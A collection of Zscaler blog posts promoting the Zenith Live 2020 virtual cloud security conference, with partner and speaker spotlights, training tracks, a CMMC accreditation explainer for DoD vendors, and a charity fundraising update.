Zscaler Blog — News and views from the leading voice in cloud security.

FireMon and Zscaler Highlight Access Policy Management at Zenith Live 2020

Zenith Live is happening next week, and while you're at this year's virtual summit, we hope you will take time to check out our sponsors’ booths in the Virtual Partner Hall. As a Zenith Live Gold Sponsor, FireMon will be there highlighting the combined FireMon and Zscaler solution and how it provides enterprises with better company-wide access policy management and visibility.

Leveraging Zscaler’s API, FireMon applies real-time policy analysis to ensure that effective enforcement and network segmentation are in place. Customers can visualize configuration, policy, and rule usage statistics across all network security enforcement points through a single pane of glass. This centralized management approach allows customers to validate policies against regulatory or corporate standards, analyze access across the network, and monitor change to pinpoint risks quickly.

Zscaler and FireMon provide:

Policy Management. Normalize and manage policies across firewalls, next-generation firewalls, and cloud environments from various vendors from a single pane of glass.
Policy Validation. Validate policies against regulatory requirements or custom-defined policies.
Access Analysis. Confirm Zscaler security controls enforce the desired enterprise-wide access, security, and compliance policies.
Rule Base Compliance. Monitor and ensure security controls continuously maintain compliance with defined access and rule policies. Identify rule, access, and configuration compliance violations.
Network Mapping. Automatically collect and build Zscaler Cloud Firewall data into a visual and interactive model that provides network abstraction of access paths end-to-end with access path analysis and network map visualization.
Rule Review. Analyze firewall configurations to identify hidden, unused, shadowed, or overly permissive rules that provide more access than necessary.
Change Tracking. Track changes to Zscaler Cloud Firewall rules for compliance or rule review analysis. Ensure changes are certified. Identify when a change occurred, who made the change, and whether it was expected, and determine if the difference created a negative impact.

See how the Zscaler and FireMon integration works: Using FireMon, joint customers can visualize and manage Zscaler Advanced Cloud Firewall policies alongside traditional firewalls and other network security policy enforcement points. This simplifies migration and ensures continuous visibility, control, and compliance across hybrid network environments.

Check out the video below, describing how the partnership between Zscaler and FireMon helps secure digital transformation.

Register now for Zenith Live—a virtual and free event starting December 8, 2020. Visit FireMon’s booth to learn more or talk to a FireMon expert about integrating Zscaler and FireMon solutions for better, more secure digital transformation.

Amit Raikar

Go Beyond Limits in Zenith Live’s Virtual Game

We’re looking forward to seeing you at Zenith Live 2020 Virtual Cloud Summit on December 8-10. At Zenith Live, you can join other IT leaders and pioneers creating real change in their organizations by leading the drive to a mobile, cloud-first future. The theme of Zscaler's third annual cloud conference is “Beyond Limits.”

Take the opportunity to go beyond limits during the conference: Your mission is to blow out our conference-wide game and rack up tons of points on the Zenith Live leaderboard in our Virtual Lounge! You can help some important charities in the process. For each activity during the conference—attending a breakout session, visiting a partner booth, watching a CxO panel, participating in a Q&A lecture, etc.—you earn “mission” points.
The highest point earners at the end of the conference will win a cool swag package!*

First prize. $100/€100 Amazon voucher, a Zenith Live T-shirt, and Andy Greenberg’s book Sandworm.
Second prize. $50/€50 Amazon voucher, a Zenith Live T-shirt, and Andy Greenberg’s book Sandworm.
Third prize. A Zenith Live T-shirt and Andy Greenberg’s book Sandworm.

You can find a list of activities and their associated mission point values in the Virtual Lounge once Zenith Live begins. Daily scores are tabulated on Zenith Live’s mission scoreboard. When you’re in the virtual lounge, don’t forget to take a picture and socialize it on Twitter using #ZenithLive. Play the Whack-a-Threat game as well! Both activities earn mission points towards winning the game!

Part of Zenith Live’s beyond limits mission is giving back to the community. We encourage you to explore and support two charities during the conference:

Global Food Banking Network. The Global FoodBanking Network (GFN) is an international non-profit organization that nourishes the world’s hungry through uniting and advancing food banks in more than 40 countries.
Girls Who Code. Girls Who Code is an international non-profit organization working to close the gender gap in technology and change the image of what a programmer looks like and does.

We hope you’ll donate to these worthwhile charities before, during, and after Zenith Live. Leaderboard prize winners also have the option of donating the value of their prize to one of the above charities.

Good luck with the game! Go beyond limits and explore every corner of Zenith Live to get the maximum number of points. Check the leaderboard daily to see who is in the lead.

This year’s summit features inspiring speakers and practical training for CxOs, IT execs, network architects, security managers, and business leaders who seek secure digital transformation beyond limits. Register now.

*Some conference attendees are not allowed to accept gifts from third parties.
Please check with your organization as to their policies.

David Avery

What Does CMMC Accreditation Mean for Zscaler Customers and DoD Vendors?

Those of us who work within the DoD community have spent many hours over the last few months discussing the Cybersecurity Maturity Model Certification (CMMC) and what it will mean for the defense community if, or when, it rolls out. All the discussion of permutations and possibilities is leading to some confusion regarding how or when to move forward. Let’s take a closer look at the CMMC, why it matters, and what it means for current and potential DoD vendors.

Why CMMC?

Led by the Office of the Under Secretary of Defense for Acquisition and Sustainment (OUSD A&S), the purpose of the CMMC is to provide formal accreditation for any organization within the defense industry base (DIB) that handles controlled unclassified information (CUI) or federal contract information (FCI).

Of course, adhering to security requirements is not new for DoD vendors. These organizations are already required to comply with existing government regulations (such as the NIST SP 800-171 standard as well as other requirements under DFARS 252.204-7012). Under these provisions, individual organizations were responsible for their security standards, which DoD never reviewed or confirmed. However, DoD and its broader community recognize this self-assessment is no longer enough to protect government data.

That’s partially due to the growing threat landscape facing federal agencies and their associated vendor communities. The Council of Economic Advisers (CEA) released a report in 2018 that said malicious cyberattacks were responsible for $50 billion to $100 billion in losses to the U.S. economy in 2016 alone. Katie Arrington, chief information security officer for DoD’s acquisition and sustainment office, also noted that cyber adversaries have successfully targeted DoD contractors who haven’t fully secured their networks.
It’s no wonder the DoD is taking extra precautions around the government’s ability to secure the immense quantities of data it accumulates and shares with the DIB. Whether it’s a DoD contractor, corporate partner, or academia, anyone who touches that government data needs to be responsible for its security—to some degree.

CMMC: An assurance program for the DIB

In the way that FedRAMP provides security assurances for cloud computing, CMMC accreditation will provide security assurances for government data that these DIB organizations possess within their defined security boundaries. Despite the size of the impacted community and the amounts of data to protect, CMMC provides a straightforward approach. The DoD vendor community must meet controls around data. Many of these controls already exist under other rules and accreditations. The only difference is that the wording is specific to the DoD community and its relationship with the DIB.

At this time, the CMMC Accreditation Body is figuring out how to facilitate reciprocity between other accreditation programs. In fact, to help provide clarity, they are developing a matrix to map the controls among different accreditations. It is in review now and should be published in the next few months.

The big picture

If security rules and accreditation exist, why add another one? It all comes down to the protection of the government's data in applicable scenarios. Since the days of the initial DARPANET, the DoD has been developing better ways to share sensitive government data with the DIB. Yet, there has never been any kind of body overseeing how these partners are securing that data on the government's behalf.

Of course, it is in each contractor’s own best interest to protect the data or risk losing current (and any future) contracts. The same applies to reporting any data or security breaches. However, DoD vendors are not currently required to prove their security at the outset to win a contract.
Due to the complexities of government contracting and acquisition, companies within the United States do not all compete for these contracts on the same level. That fact could possibly lead to accepting additional risks on contracts that should not be acceptable. CMMC addresses that.

What DoD contractors need to know

None of the above answers the big question: “How do we proceed today?” How do you choose who to partner with? How do you know that a solution you buy today will undoubtedly assist you in meeting CMMC accreditation in six months? More importantly, how do we choose a partner that will deliver on the intent of the policy even if some of the aspects of the policy change?

One answer is to look for a partner that has proven to be 100-percent compliant—a partner such as Zscaler. Zscaler has achieved all major government and commercial certifications, authorizations, and reporting requirements, including FedRAMP (Moderate and High), ISO 27001, SOC 2, FIPS 140-2, CSA-STAR, ISO 27018, ISO 27701, CJIS, and more. With the support of our independent assessors, Schellman and Company, LLC, we have no doubt that we will achieve certification when CMMC is codified. As sometimes happens with these government initiatives, if CMMC morphs into something different, we will also garner that accreditation.

We will do it because securing data is our business

Zscaler products provide security on top of an organization's network environment and associated risks. If your company is working on behalf of the government and you’re concerned about how you will contractually meet the security of the government's data while you’re accessing it, or providing the security to prevent unauthorized access to it, then Zscaler is the partner you're looking for. At the same time, we can secure your environment.
Because we're the security partner in the greater information assurance ecosystem, we can secure your corporate environment at the same time we secure the government data you have access to with the same capability. That means you’re not bound to build a network security stack for the government and then another one with a little looser security for your user base. Rather, partnering with a global leader in zero trust and SASE, Zscaler empowers the organization to transform its security architecture to a Zero Trust Exchange overlay of all aspects of the organization's IT environment.

We offer, and always will, a natural transformational shift in how you're managing transport or network security. We fit that roadmap regardless of what the policy may be called, as our core competency is to deliver world-class security globally while improving user experience.

Final thoughts on CMMC

Everyone involved with government data needs to be held accountable for managing that data. CMMC acknowledges that the industry cannot self-assess anymore. We've had too much intellectual property leaked, and sensitive unclassified information exposed due to a lack of good cyber hygiene. CMMC will help fix that.

One caution, though. As Katie Arrington has pointed out numerous times, many companies claim to offer accreditation, guidance, and even “pre-certified” vendor solutions. That is not the case. Beware of any organization that claims to be a CMMC governing body. The OSD’s official website only recognizes the CMMC Accreditation Body. The best advice for a DoD vendor is to turn to the official source for information and work with a partner who has a proven track record of achieving government accreditation.

Patrick Perry

At Zenith Live: Customer Voices Say Trust Zero Trust

Zenith Live starts in just over a week, and attendees can look forward to two days full of ways organizations are accelerating secure digital transformation for the cloud- and mobile-first world.
Each day starts out with main stage keynotes, including Zscaler customers discussing how they solved network and security transformation issues using zero trust and the Zscaler Zero Trust Exchange platform. Don’t miss these real-world solutions from enterprise leaders on how they addressed company-wide agility and resiliency in the face of new challenges and market changes.

Making IT more resilient, responsive, and secure: Johnson Controls revolutionizes smart cities and global communities.

Join this keynote to learn how Diane Schwarz (CIO) at Johnson Controls International is modernizing IT to align with its ambitious goals to revolutionize smart cities and global communities. Carl Erickson (CISO) and Maria Jose Lloret Crespo (CTO) join Diane to explain how they safely transformed IT to quickly handle unforeseen events without impacting business or the security of its employees or customers. This transformation allowed them to answer the call when large acquisitions doubled the company's size and during a global pandemic that required their essential services to continue uninterrupted. They were able to handle all of it in stride due to the foundations they had laid that brought about greater agility and uncompromising protections.

The “Why” of Secure Digital Transformation: Takeda Pharmaceuticals Company uses Zero Trust.

Join Mike Towers, CISO of Takeda Pharmaceuticals, Ltd., as he shares his successful roadmap for secure digital transformation. During this session, you'll get in-depth guidance on building a case for change across the organization based on business value. Brent Ball, Takeda's global head of intelligence, analytics, and response, will share a detailed account of how the team used security transformation to reimagine Takeda’s operations, resulting in reduced risk and a better patient, caregiver, and third-party partner experience.

Keeping the World Employed Through Transformation – The Story of ManpowerGroup.
What do you do when a global pandemic makes it more important than ever to keep the world employed? In this keynote, you’ll hear how Randy Herold, CISO at Manpower, convinced the business to support transformation and is using it to accelerate M&As and to simplify public cloud adoption. You'll also hear from Abdul Khan, VP of Global Infrastructure and Operations at Manpower, who describes how he was able to help define the IT vision, pioneer a transformation strategy, and shift away from legacy networks. When the business called on them, their teams had the Fortune 500 leader in workplace solutions—with its 28,000 users, 45,000 endpoints, and 2,500 offices—prepared when it mattered most.

We hope that you can join us December 8-9 at Zenith Live and learn how our customers are using zero trust to accelerate secure digital transformation. You’ll even hear from an astronaut about what it takes to spend nearly a year in space. Registration is now open.

David Avery

Zenith Live 2020 Session Spotlight: “Defending the DoDIN, One of the World’s Largest Networks”

Protecting one of the largest, most complex, and most-frequently attacked IT infrastructures in the world? It's just another workday for William Robinson, U.S. Army Chief Technology Officer G6. Robinson and team oversee the Department of Defense Information Network (DoDIN), which serves the entire U.S. Department of Defense (DoD), one of the largest federal organizations in the world.

Federal government agencies aren't always renowned for progressive, forward-thinking approaches to cybersecurity. But Robinson's secure digital transformation strategy quickly dispels that notion, at least in his case. He is leading the Army’s digital transformation efforts to ensure secure connectivity across the Department of Defense. The DoD has multiple levels of service and multiple levels of leadership, all defending against the most complex attacks—cyber and "other"—in the world.
For Robinson and the DoDIN, digital transformation meant a shift to the cloud, and away from costly, unscalable point products. But it was clearly the best strategy to modernize and maintain an IT infrastructure as unique and vast as the DoDIN. Robinson worked (and continues to work) with a diverse ecosystem of partners in industry, academia, and other government agencies to ensure DoD stays ahead of cyber threats. Ultimately, a zero trust approach was found to be the most effective for securing the DoD's globally-dispersed (very globally-dispersed) workforce.

Robinson will share the U.S. DoD digital transformation story at Zenith Live 2020. He'll join me in a Fireside Chat along with Patrick Perry, the Zscaler Director of Emerging Technology for DoD/IC, himself a United States Armed Forces veteran of 22 years, working in IT Architecture and Integration with a number of organizations, including Special Operations Command.

This year, every seat’s in the front row as Zenith Live 2020 goes online and free. But space is limited. Register now at

Jose Padin

Zenith Live 2020 Session Spotlight: “SSL Inspection is Critical: How to Overcome Legal and Privacy Objections”

All that data coming into your enterprise? It’s encrypted. Well, nearly 90 percent of it is, at least according to Google. Most encryption serves a noble purpose: Users employ it to secure the data they send across the open internet. Unfortunately, so too do threat actors, who encrypt their destructive payloads to obscure them from traditional security inspection.

The real problem is one of scale: Legacy hardware cannot easily scale to inspect all incoming and outgoing data traffic, especially when data traffic volume spikes. Some security approaches simply ignore that fact; others sample incoming secured data. Both approaches leave enterprises vulnerable. More and more hackers are taking advantage of the fact that many organizations simply can’t inspect all encrypted HTTPS traffic.
Those organizations make attractive attack targets: In the last nine months, SSL/TLS-encrypted threat activity has increased 260 percent over last year. And in the last six months, the Zscaler ThreatLabZ security research team has seen ransomware attacks delivered inside encrypted traffic grow five-fold. (A recent Zscaler ThreatLabZ study analyzed threats hidden in encrypted traffic and looked deeper into sophisticated attack techniques.)

The cloud-based Zscaler Zero Trust Exchange offers comprehensive inspection of all SSL/TLS-encrypted data traffic, with no impact on performance. But that’s only a first step: Many organizations may still face obstacles—architectural, technological, or legal—implementing full inspection of encrypted data. Some organizations must delay adopting encryption inspection due to GDPR-compliance or works-council concerns. But such delays expose enterprises to risk, and not just because they’re not using the full power of their security solution(s).

Zscaler is helping organizations protect their users, applications, and data assets with full SSL/TLS encryption inspection. Next month, join me and my colleagues Brad Moldenhauer and Nicolas Casimir (Zscaler CISOs for the Americas and EMEA regions, respectively) at Zenith Live 2020, where the three of us will present “SSL Inspection is Critical: How to Overcome Legal and Privacy Objections.” Our talk will focus on the risks posed by encrypted threats; the business, legal, privacy, and security implications of managing that risk; and how the Zscaler Zero Trust Exchange applies a scalable approach to SSL/TLS inspection.

This year, every seat at Zenith Live is in the front row, as the event goes virtual: All sessions are available online and free. But space is limited, so register today at

Kevin Schwarz

Zenith Live: Training for the Next Generation of Cloud Leaders

Do you feel that? It’s the excitement building around Zenith Live, the Zscaler Annual Cloud Summit, which is only a few weeks away!
We’ve been preparing around the clock for this year’s all-virtual conference, and we’ll be bringing you incredible opportunities to hear from industry visionaries, join panel discussions with business leaders, connect with peers...and learn!

In fact, the training this year includes a slew of two-hour essentials and masters classes with lab exercises. These courses are designed to help you tackle some of today’s toughest networking, cloud, and security challenges on the digital transformation journey. You can gain new skills or develop further those you already have. Not only that, but you’ll earn CPE credits.

We can’t stress enough that the three training tracks—Networking, Security, and ZPA/Zero Trust—offer something for everyone. Below are just some of the sessions we’ll be offering at Zenith Live. You can access the full course list by visiting our agenda page. Registration is open, but space is limited and some sessions are already full, so get yourself registered and signed up for training while space is available.

Networking Essentials

Cloud Firewall with Z-tunnel 2.0: Explore securing all ports and protocols with Zscaler Cloud Firewall and Cloud IPS from the perspective of network and security operators as well as testing the end-user experience.
Traffic Forwarding with SD-WAN: Learn how to enable branch network transformation for rapid deployment of integrated products from Zscaler SD-WAN technology partners.

Networking Masters

Zscaler Client Connector Deployment & User Authentication: Participate in hands-on lab exercises that explore options for the automated deployment and enrollment of Client Connector.
User Experience Management with ZDX: Learn how ZDX provides visibility into the end-user device, network path, and SaaS/internet application performance for comprehensive user experience insights.
Security Essentials

Threat Protection with Cloud Sandbox and ZIA: Learn to configure and monitor malware and advanced threat protection, including Cloud Sandbox malicious active content protection.
Endpoint Protection Integration: Learn how the Zscaler platform integrates with third-party endpoint protection solutions such as CrowdStrike Falcon to provide end-to-end protection from device to app.

Security Masters

Data Protection with DLP & EDM: Learn how Zscaler Cloud Data Loss Prevention with Exact Data Match (EDM) allows you to secure data in motion across any of your users’ network connections.
Security Operations Workshop: Learn about Zscaler security layers and how to understand security logs, APIs, integrations, and threat hunting.

ZPA/Zero Trust Essentials

Getting ZPA Working: Learn best practices for securing remote access to private apps while delivering the best user experience possible in this hands-on session.
ZPA Application Discovery and Basic Management: Learn to configure application discovery, convert the discovered applications to ZPA application segments, and build application access policies.

ZPA/Zero Trust Masters

ZPA Advanced Policy Control: Discover how advanced ZPA policy controls provide the granularity needed to provide application segmentation without network segmentation.
ZPA Troubleshooting: Work with sample troubleshooting scenarios to gain experience with troubleshooting tools, the data they provide, and how to triage common ZPA misconfiguration issues.

Remember, space is limited for each section, so register today.

Join us at the Zenith of Digital Transformation

Zenith Live 2020 will be unlike any other virtual conference. As the premier event dedicated to secure digital transformation, you’ll have the opportunity to connect with Zscaler leaders, customers, partners, and your peers, and we’ll even have an astronaut on hand to talk about what it really means to go beyond limits.
Registration is live, so don’t wait to reserve your spot.

Christopher Leach

Keeping Food on the Table Amid COVID-19: How Second Harvest of Silicon Valley Gives Back

A thriving economy in Silicon Valley has sent housing prices soaring, leaving many of our community members, including families, seniors, and veterans, struggling to put nutritious food on the table. Since 1974, Second Harvest of Silicon Valley has helped the most vulnerable members of our community through its mission of ensuring that anyone who needs a healthy meal can get one.

Especially now, amid the COVID-19 pandemic, our communities need more help than ever. Second Harvest of Silicon Valley provides food to approximately 500,000 people every month—twice the amount they served prior to the pandemic. Many of those they serve are essential workers, including cooks, cashiers, health care workers, and teachers.

For the second year, Zscaler was honored to be included in the Second Harvest of Silicon Valley’s 48-Hour Virtual Race to End Hunger. Participating companies enter a friendly competition to see who can raise the most money in two days with a company match. In this year’s race, Zscaler saw record participation from employees. In 48 hours, Second Harvest and the participating companies raised more than $939,000, which will provide more than 1.8 million healthy meals to those in need in the Silicon Valley. This year, more than 86 percent of Zscaler employees contributed. As a company that values giving back to the community, we couldn’t be more proud—it speaks volumes about the people and giving culture at Zscaler.

Second Harvest estimates that one in four people in Silicon Valley face food insecurity, which is defined as a household-level economic and social condition of limited or uncertain access to adequate food. One in 10 people in Silicon Valley receives food from Second Harvest. Please consider donating or volunteering to support your local community.
Get inspired and read more about the impactful work Second Harvest of Silicon Valley is doing to benefit those in need.

Greg Pappas

The Zenith Live 2020 CXO Panels: Immediate, Engaging, and Open to All

This post originally appeared on LinkedIn.

In December, every seat at the premier global cloud summit will be in the front row. This year, Zenith Live 2020 goes virtual, with all sessions available online and for free. The online event will deliver an immediacy that brings business, networking, and security leaders into direct contact with IT leaders for engagement, learning, and an incredibly intimate conversation.

This will be particularly true for the Zenith Live CXO Perspectives panels, a series of discussions with leaders from business, network architecture development, and cybersecurity detailing their insights, experience, and cloud journeys. CXO Sessions are tailored to function and are offered in all regions (Americas, Europe, and Asia-Pacific). Even better, the CXO Perspectives Panels are open to all attendees (but register now because space is limited). Below, a few highlights.

For CIOs and Business Leaders

Early investment in digital transformation set Essen, Germany-based logistics giant DB Schenker on a progressive path to secure digital transformation. But it was the COVID outbreak (and the rapid response to remote-work enablement demands) that solidified CIO/CDO Markus Sontheimer's commitment to the cloud (and to Zscaler). Sontheimer will share his story—including details of how DB Schenker pivoted thousands of employees to remote work in a matter of days—in conversation with Zscaler CIO and EVP of Emerging Technologies Patrick Foxhoven on December 9th at Zenith Live 2020 for the EMEA region.

For CTOs and Network Architects

John Maya is a believer in the maxim, "Never let a good crisis go to waste," but, in his words, "COVID has redefined what 'crisis' really means."
The VP of Operational Excellence for Royal Caribbean Group led his organization's operational response to the recent pandemic, including shifting away from legacy networking technology to cloud-based remote access with Zscaler Private Access (ZPA). Hear more from Maya on December 8th when he speaks with Zscaler Senior Director of Transformation Strategy Pam Kubiatowski at Zenith Live 2020 for the Americas region. He'll share how he enabled tens of thousands of Royal Caribbean Group employees to work remotely in just two weeks, and how the Zscaler Zero Trust Exchange provides new levels of visibility into corporate data traffic.

For CISOs and Security Professionals

Fannie Mae CISO Chris Porter is tasked with securing users, assets, infrastructure, and data for the government-sponsored U.S. mortgage-loan financing organization. For Porter, the role of the CISO doesn't "end" with security. It starts there. He has overseen Fannie Mae's secure digital transformation, and has worked to make security an integral component of the organization's business fabric: IT decisions—even security ones—focus on customer and user experience. Porter will discuss Fannie Mae's journey to the cloud at Zenith Live 2020 in conversation with Zscaler President and CTO Amit Sinha.

This year, the premier global cloud summit will be more intimate, personal, and engaging than ever. Join me and business, network, and security leaders like you December 8–10 (14–15 in Asia) for Zenith Live 2020. Space at the CXO Perspectives panels is limited, so sign up now at

Kavitha Mariappan

Don’t miss CrowdStrike at Zenith Live 2020

Zenith Live 2020 Virtual Cloud Summit on December 8-10 isn’t that far off. Join revolutionary IT leaders who are creating real change in their organizations by embracing secure digital transformation and driving a mobile- and cloud-first future.
The theme of Zscaler's third annual cloud conference is “Beyond Limits.” The partnership between CrowdStrike and Zscaler takes the endpoint security and cloud application architecture beyond limits by enabling the rapid identification of threats discovered at the cloud edge, and seamlessly facilitating remediation across both the platforms. CrowdStrike is a Zenith Live Platinum sponsor and will host a booth at the Virtual Partner Hall during the summit.

We asked CrowdStrike to quickly answer a few questions about CrowdStrike Falcon, Zscaler, and Zenith Live:

What is it that CrowdStrike Falcon does to help enterprises realize digital transformation goals?

CrowdStrike Falcon® architecture, with its single lightweight agent supporting a vast cloud repository of actionable threat data and intelligence, helps redefine security for the cloud era using an endpoint and workload protection platform. Leveraging cloud-scale artificial intelligence (AI) and powered by the proprietary CrowdStrike Threat Graph, the Falcon platform offers real-time protection and visibility to effectively stop breaches no matter where the endpoints are located—on or off the network. With CrowdStrike, customers can realize better protection, better performance, and immediate time-to-value during their digital transformation journey.

How does the partnership between CrowdStrike and Zscaler contribute to an enterprise’s digital transformation journey?

Traditional network security and endpoint protection solutions that sit on-premises are ineffective in today’s cloud-first and mobile world. Complex IT network security appliance stacks (physical or virtual) are cumbersome to deploy, manage, and maintain. Enterprises must transform this traditional security model to a cloud-native, zero trust architecture to combat increasingly sophisticated attacks and gain visibility into endpoints and cloud applications.
Together, CrowdStrike and Zscaler modernize security protection by integrating endpoint and network security solutions, increasing end-to-end visibility, detection, and containment with automation. Threat data from the Zscaler Cloud Sandbox is correlated with CrowdStrike’s endpoint telemetry to quickly identify zero-day threats, analyze the affected endpoints, and enact rapid quarantine action. The integration of posture-driven, conditional access delivers zero trust access control from the endpoint to cloud applications without the need for Virtual Private Networks (VPNs). This ensures that only validated endpoints can access authorized apps and assets, reducing exposure to attacks and breaches. What presence will CrowdStrike have at the Zenith Live conference? CrowdStrike and Zscaler’s mutual customer, Cushman & Wakefield, will explain how cloud-native zero trust security enabled them to transform their endpoint security and cloud application access to meet the needs of a cloud- and mobile-first world—both in a pre-COVID and post-COVID time. Speakers from CrowdStrike and Zscaler will discuss current solutions, and preview an upcoming Zscaler integration with CrowdStrike’s endpoint security posture assessment that enables tighter enforcement of dynamic conditional access policies. This integration helps organizations embrace a Zero Trust Network Access (ZTNA) architecture. On December 8-10, 2020, Zenith Live will bring together innovators leading their organizations’ secure digital transformation. Don’t forget to check out CrowdStrike’s booth at the Zenith Live Partner Hall during the conference, and don’t miss their session Cushman & Wakefield Security Transformation: Unifying Endpoint and Cloud Security with CrowdStrike and Zscaler. This year’s summit features inspiring speakers and practical training for CxOs, IT execs, network architects, security managers, and business leaders who seek secure digital transformation beyond limits. Register today. 
Amit Raikar

Zenith Live 2020 Speaker Profile: Hanna Hennig, Siemens CIO

Hanna Hennig will speak on the main stage December 9 at Zenith Live 2020, the Zscaler Annual Cloud Summit. The pandemic has forced organizations to accelerate digital transformation: Enterprises that seize the moment to embrace a perimeter-less security model will be more agile, profitable, and competitive. That rings true for Siemens AG CIO Hanna Hennig, who joined the company right before COVID changed everything. "[It was a] very exciting time to be thrown into the 'cold water,'" noted Hennig, speaking with Zscaler CEO Jay Chaudhry last month at the Zscaler CXO Summit. Hennig had "to ensure our company was still productive" when COVID hit, and that meant enabling 300,000+ Siemens employees to work from home. She looked to Zscaler—in particular, Zscaler Private Access (ZPA)—to provide scalable, secure remote connectivity for the Siemens workforce. Hennig had to accelerate the ZPA rollout: "We moved over [from VPN to ZPA for 300K employees] in days. Not weeks. Days." Siemens' successful (and aggressive!) pivot to a work-from-anywhere (WFA) workforce represented the first time in company history such a dramatic IT change had been introduced so rapidly. But for Hennig, it had two additional impacts: It both provided perspective and raised expectations. Ultimately, the "better flexibility, better security, even better performance" Siemens now enjoys with Zscaler comes down to a very practical element of the Siemens transformation journey. "The other part, it's all about people," concludes Hennig. "We IT folks we need to understand the technology, we need to pick the right technology, but we also need to ensure that those who we provide the technology and solutions for, that we are also taking them with us." Hear the rest of the story directly from Siemens CIO Hanna Hennig when she speaks on the main stage at Zenith Live 2020.
This year, the world’s premier cloud summit goes virtual and free December 8–10. You’ll get the opportunity to engage with Hanna Hennig and IT leaders from Unilever, Sandvik, DB Schenker, Tesco, and many more.

Toph Whitmore

Grit, Resilience, and Patience: Jody Davids’ IT Leadership Career

It’s just a few weeks until December 8, when Zenith Live begins, and there is so much I’m looking forward to. In particular, I am thrilled to be moderating a Women in IT panel, where I’ll be joined by IT leaders in a discussion about how confidence, a growth mindset, and professional resilience can lead to a more diverse set of IT leaders. One of the women on the panel is Jody Davids, whom I’ve had the pleasure of presenting with before and whose remarkable journey is inspiring the next generation of IT leaders. Jody Davids started her IT career as a secretary. She earned a bachelor's degree at night and got interested in how IT functions in the enterprise. Her first programming job started after a colleague signed her up for entry-level programming training. “That’s how well thought out my IT career was,” she once told a group of rising IT executives. She has over 30 years of experience leading and developing technology initiatives at large organizations, including CIO roles at Cardinal Health, Best Buy, and Agrium, culminating in her position as senior vice president and global CIO at PepsiCo. When Davids retired from PepsiCo in October 2019, she managed an IT team of 3,000 responsible for delivering technology services to 260,000 employees. Early in her career, Jody joined Apple, where she worked on the Apple III with Steve Jobs. After that, she went to Nike, a change she described as significant: it gave her insight into two distinct and contrasting types of leaders.
One (Steve Jobs) a visionary icon who galvanized his teams with bold ideas, a forceful personality, and a little intimidation; the other (Phil Knight) a quieter and less bombastic leader who leaned more often on the empathetic elements of management. The change opened up Davids to the realization that there are many different paths to successful leadership, and she could determine her course. Despite humorous asides about her start, Ms. Davids absolutely set an early goal of being a Fortune 200 company CIO. Reflecting on how to achieve this goal, she asked herself, “What do I have? What part of me is ready to be a CIO? What do I need to develop to truly become more viable as a candidate for a CIO opportunity?” She also set a distinct goal to become a board-level CIO. She is currently a member of Premier Inc. and is a board advisor to the nonprofit The Eyes of Freedom: Lima Company Memorial. Davids believes that the CIO is one of only a handful of executives who genuinely have an entire organization’s perspective. CIOs have the enterprise operational knowledge that translates to boardroom intelligence and the cybersecurity knowledge and familiarity that other board members don’t. There is a saying that has informed Jody Davids’ decisions throughout her career: “You don’t always get to choose what happens, but you DO get to choose how you respond to it.” With this maxim as her starting point, Davids crafted a self-management practice that includes three pillars: resilience, grit, and patience. When the three pillars actively work together, they support whatever purpose you choose to pursue. Grit, resilience, and patience help future leaders navigate their course in seeking more challenging opportunities—especially when facing the inevitable setbacks. There have been many lessons in Ms. Davids’ career, both from her successes and her failures. These lessons have ultimately made her a better leader. 
I am honored to be joining Jody Davids and other leaders in the Women in IT panel session, and I hope you’ll be there. Registration is open now. Sign up today and add this session to your agenda. You don’t want to miss it! Kavitha Mariappan Secure Digital Transformation is a Winning Strategy Earlier this month, when I began my journey as chief marketing officer at Zscaler, I knew that I was becoming part of a visionary organization. Zscaler’s approach to securing the enterprise in the era of cloud and mobility was a radical departure from the ways it had been done in the past. In the 12 years since the company was founded, Zscaler has proven that its cloud-native security architecture is the right approach, providing an extensible platform that solves customers’ security challenges and enables them to achieve their digital transformation goals. So, it does not surprise me that Zscaler has been named in this year’s “Technology Fast 500,” an award program sponsored by Deloitte that recognizes 500 of the fastest-growing and most innovative companies in North America. Though I’ve only been here two weeks myself, I’ve known Jay Chaudhry, the company’s founder and CEO, for many years, and I’ve had the opportunity to meet with dozens of the people whose work is directly responsible for Zscaler’s growth, its customer focus, and its nonstop innovation. It’s been a thrill, and it’s just getting started. This year, it’s been especially gratifying to see how Zscaler has been helping customers through what has arguably been the most challenging time in memory. Of course, the crisis isn’t over, and its full magnitude, particularly its human toll, cannot be known. But I do know that enabling companies to continue operations with their employees working safely and remotely has been critical—not only to those companies, but to economies, communities, and, most of all, to families. 
Zscaler has been instrumental in this effort, providing secure application access for all the employees in thousands of organizations around the world, often as they connect over unsecured networks and use unmanaged devices. It has been a testament to the power and scale of the cloud, and to the importance of secure digital transformation for fueling the flexibility and resiliency organizations need. If you’d like to see what all this means to real-world organizations, join me at Zenith Live, the Zscaler Annual Cloud Summit, which kicks off December 8. It’s your opportunity to hear from leaders who have successfully navigated the secure digital journey and learn from experts on SASE, data protection, DevSecOps, CASB, zero trust, CSPM, and so much more. This year’s virtual event will bring together thousands of IT professionals at all levels, and it will offer something of value for everyone who attends. I encourage you to register and create your agenda. In addition to dozens of technical sessions, you can join in expert-led training, inspiring keynotes, “birds of a feather” panels, live demos and Q&A, and you can even hear from an astronaut. I can’t wait for the virtual summit to begin, and I hope to see you there! Chris Kozup Don’t Miss Silver Peak at Zenith Live 2020 We’re looking forward to seeing you at Zenith Live 2020 Virtual Cloud Summit on December 8-10. At Zenith Live, you can join other IT leaders and pioneers creating real change in their organizations by leading the drive to a mobile, cloud-first future. The theme of Zscaler's third annual cloud conference is “Beyond Limits.” The partnership between Silver Peak and Zscaler takes the secure SD-WAN solution beyond limits by enabling cloud-delivered secure access to all applications everywhere. Silver Peak is a Zenith Live Platinum sponsor and will be hosting a booth at the Partner Hall during the summit. 
